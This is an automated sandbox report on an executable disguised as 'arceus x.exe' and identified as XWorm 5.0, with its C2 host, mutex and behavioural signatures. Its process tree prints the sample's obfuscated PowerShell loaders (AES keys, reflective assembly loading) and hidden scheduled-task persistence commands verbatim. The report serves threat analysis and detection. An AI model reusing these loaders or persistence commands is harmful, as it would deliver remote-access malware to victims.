Analysis
max time kernel: 48s
max time network: 48s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64 arch:x86 image:win11-20240508-en locale:en-us os:windows11-21h2-x64 system
submitted: 28/06/2024, 11:22
Static task: static1
General
Target: arceus x.exe
Size: 10.3MB
MD5: 380f08da7396daa261f7edabdc161388
SHA1: 3622717512e77bb2ea51c9af995fa1c359413d8f
SHA256: 2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3
SHA512: f724db6274890b9472067437f69a4d0d01bc4d911a32515d52c502d8524a31c1563641fed55d2021e9853bb2c1618aec24ac23c9f074b7331be4032917598424
SSDEEP: 196608:p6iDnLZQi21bRqt9Vs9sMm2agR2wCg6N6FYx1jg+elKIK0G8V1f83:plDLvgbRWs93dW9AFYH8kd0Ge83
Malware Config
Extracted
Family: xworm
Version: 5.0
C2: amount-socket.gl.at.ply.gg:29643
Mutex: CBOJbsqFCwukBOQm
install_file: USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource: behavioral1/memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp  yara_rule: family_xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid  Process
4128 powershell.exe
1956 powershell.exe
4656 powershell.exe
3148 powershell.exe
1792 powershell.exe
2832 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid  pid_target Process      procid_target
2852 2832       WerFault.exe 124
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                                    Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
Modifies registry class 2 IoCs
description  ioc                                                                               Process
Key created  \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings  powershell.exe
Key created  \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings  powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 864 msedge.exe 864 msedge.exe 1188 msedge.exe 1188 msedge.exe 4128 powershell.exe 4128 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 4128 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 2640 identity_helper.exe 2640 identity_helper.exe 2832 powershell.exe 2832 powershell.exe 3148 powershell.exe 2832 powershell.exe 1776 msedge.exe 1776 msedge.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3148 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe Token: 35 4656 powershell.exe Token: 36 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe Token: 35 4656 powershell.exe Token: 36 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3148 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 2100 wrote to memory of 1188 2100 cmd.exe 94 PID 2100 wrote to memory of 1188 2100 cmd.exe 94 PID 1188 wrote to memory of 1884 1188 msedge.exe 95 PID 1188 wrote to memory of 1884 1188 msedge.exe 95 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\arceus x.exe"C:\Users\Admin\AppData\Local\Temp\arceus x.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat"4⤵PID:3556
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
"5⤵PID:3748
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs"6⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat" "7⤵PID:3128
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
"8⤵PID:3852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 16929⤵
- Program crash
PID:2852
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"5⤵PID:1216
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=fboNTcjJ8bo5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda9c33cb8,0x7ffda9c33cc8,0x7ffda9c33cd86⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:26⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵PID:788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:16⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:16⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:16⤵PID:72
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:16⤵PID:1836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:16⤵PID:1160
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat"4⤵PID:3836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
"5⤵PID:3656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_172_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs"6⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat" "7⤵PID:1652
-
